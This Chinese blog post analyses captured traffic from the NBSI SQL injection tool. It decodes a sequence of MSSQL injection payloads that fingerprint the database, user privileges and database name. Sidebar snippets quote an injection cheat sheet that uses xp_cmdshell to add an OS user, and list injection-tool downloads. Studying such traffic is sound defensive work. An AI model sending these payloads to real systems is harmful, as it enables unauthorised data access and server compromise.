sql 注射 nbsi分析

最新推荐文章于 2018-07-26 10:08:00 发布
最新推荐文章于 2018-07-26 10:08:00 发布
阅读量760 收藏
点赞数
分类专栏: 技巧 文章标签: sql user login 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zergpest/article/details/254846
版权

根据抓包结果

1.GET /radio/?mode=user&userid=3%20and%20user%2Bchar(124)=0 HTTP/1.1
解释为
/radio/?mode=user&userid=3 and user+char(124)=0
%2B  = +
char(124) = |
2.GET /radio/?mode=user&userid=3;declare%20@a%20int-- HTTP/1.1
判断是否支持多句查询
./radio/?mode=user&userid=3;declare @a int--
3.GET  /radio/?mode=user&userid=3%20and%20(Select%20count(1)%20from%20[sysobjects])>=0 HTTP/1.1
 /radio/?mode=user&userid=3 and (Select count(1) from [sysobjects])>=0
判断是否支持子查询
4.同1
取得当前用户
5.GET/radio/?mode=user&userid=3%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)

/radio/?mode=user&userid=3 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

IS_SRVROLEMEMBER指明当前的用户登录是否是指定的服务器角色的成员。
IS_SRVROLEMEMBER ( 'role' [ , 'login' ] )

6.GET /radio/?mode=user&userid=3%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1

/radio/?mode=user&userid=3 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1

判断用户权限

7.GET /radio/?mode=user&userid=3%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
/radio/?mode=user&userid=3 And db_name()+char(124)=0
获取数据库名










zergpest
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NBSI 3.0 NBSI
06-18
downbank1025NBSI.rar
sql注入工具nbsi纯净版
08-04
老牌的sql注入工具nbsi无后门纯净版,保证无后门。自己可以自行检测。
SQL元数据注射和解决方案
Yatere的天平秤
05-14 472
<br /><br />Author : kj021320<br />Team : I.S.T.O<br /> <br />台上 kj021320穿着一套便服,一点都不像安全技术人员...<br />台下一群 黑客 骇客 红客 白客 砍客 蓝客 灰客 漂客...<br />还有一堆开发工程师和架构师 貌似很期待的在听课,接收kj021320的培训<br /> <br />kj021320 : hi,大家好...今天我要跟大家一起讨论的是SQL注射...<br />台下一片郁闷声响起<br />有位骇客郁闷道
SQL注入分析
weixin_30823683的博客
12-23 62
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数...
常用SQL注入语句
蒋小龙的IT史
11-11 815
sql注入语句大全 --是否存在xp_cmdshell  and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')  --用xp_cmdshell执行命令  ;exec master..xp_cmdshell "net user name passwor
sql注入语句大全
wcqlwyt的博客
07-22 382
sql注入语句大全--是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' an
SQL注入文章资料
bcbobo21cn的专栏
10-13 1355
sql注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1]  比如先前的很多影视网站泄露VI
SQL注入专题
小李专栏
12-06 1532
欢迎点击此处订阅本Blog<!--google_ad_client = "pub-7343546549496470";google_ad_width = 468;google_ad_height = 60;google_ad_format = "468x60_as";google_ad_type = "image";//2007-07-26:
MSSQL注射大全
Master'Blog
11-01 1549
总结一个比较全的MSSQL注射大全,要多玩玩手工,要不然会忘记的 From:http://www.cnblogs.com/aix1314/archive/2013/03/31/2991609.html sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype =
nbsi 安全检测SQL注入
09-17
【标题】:“nbsi 安全检测SQL注入” 【正文】: 在网络安全领域,SQL注入(SQL Injection)是一种常见的攻击手法,攻击者通过输入恶意的SQL代码来操控数据库,获取敏感信息,甚至破坏整个系统。nbsi,可能是某种...
NBSI2 911专版
08-06
NBSI2,全称可能为"Network Based System Inspection 2"(基于网络的系统检查2),是一个针对网络系统进行分析、检测和学习的工具。它可能包含一系列功能,如网络流量监控、系统行为分析、安全漏洞扫描以及恶意软件...
NBSI3.0 最新
02-10
NBSI3.0通过自动化扫描和深度分析,可以有效地检测出这些潜在的危险,并提供详尽的报告,帮助开发者定位问题所在。 在【描述】中提到的“亲测可用”,表明这款工具不仅在理论上有效,而且在实际应用中也表现优秀,...
SQL注入原理和ASP防注射漏洞经典方法
12-24 1179
  SQL注入原理和ASP防注射漏洞经典方法 比较经典的一片帖子,最近做个站联系被人注,烦恼,找了下资料整理一下,今天汇总转过来大家学习一下:编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQ
sql注入
weixin_34074740的博客
07-26 90
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一 部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得 某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入是从正...
Asp.net DataList编辑模板的使用
09-28 2494
DataList 提供相关的编辑模板,但和DataGrid不一样的是,DataList没有编辑按钮。要在DataList中使用编辑功能。可在项模板中增加一个按钮,Linkbutton和Button都可以。在CommandName中设置为Edit就可以把此按钮和DataList的编辑事件联系起来了。如:CommandName="Edit"更新按钮可以使用CommandName="Update"取消按
Eclipse插件安装技巧
03-19 2075
使用links方法安装eclipse插件时,包含插件的路径中必须有eclipse/plugins目录。如果没有,请自行添加。不然插件找不到如tomcat eclipse插件解压后的目录为com.sysdeo.eclipse.tomcat_3.0.0这里,要使用link方式安装插件需要在原本的路径下建立相关文件夹如path=e:/plug_ins/tomcat则需要在e:/plug_ins/tomc
Linux下 Oracle 10G安装完成后控制
01-26 1973
使用 SQL*Plus 访问数据库运行 SQL*Plus:$ sqlplusEnter user-name:/ as sysdba使用 Oracle Enterprise Manager 10g 数据库控制在 Web 浏览器中,连接到安装过程中提供的 URL。例如:http://ds1.orademo.org:5500/em(如果服务器不在 DNS 中,则必须使用 IP 地址代替主机名
C# 读取Oracle存储过程记录集错误解决办法
11-18 1776
在C#中使用游标返回Oracle的存储过程记录集时如果程序中参数的名字和Oracle存储过程输出参数的名字不一样,则会出现一下错误未处理的“System.Data.OracleClient.OracleException”类型的异常出现在 system.data.dll 中。其他信息: ORA-06550: line 1, column 7:PLS-00306: wrong number or
SQL注入教程:啊D与NBSI工具详解
教程涵盖了啊D注入工具和NBSI注入工具的使用方法,帮助理解如何检测和利用SQL注入漏洞。" SQL注入是一种常见的网络安全威胁,攻击者通过在应用程序的输入字段中插入恶意SQL代码,以获取未经授权的数据访问或控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值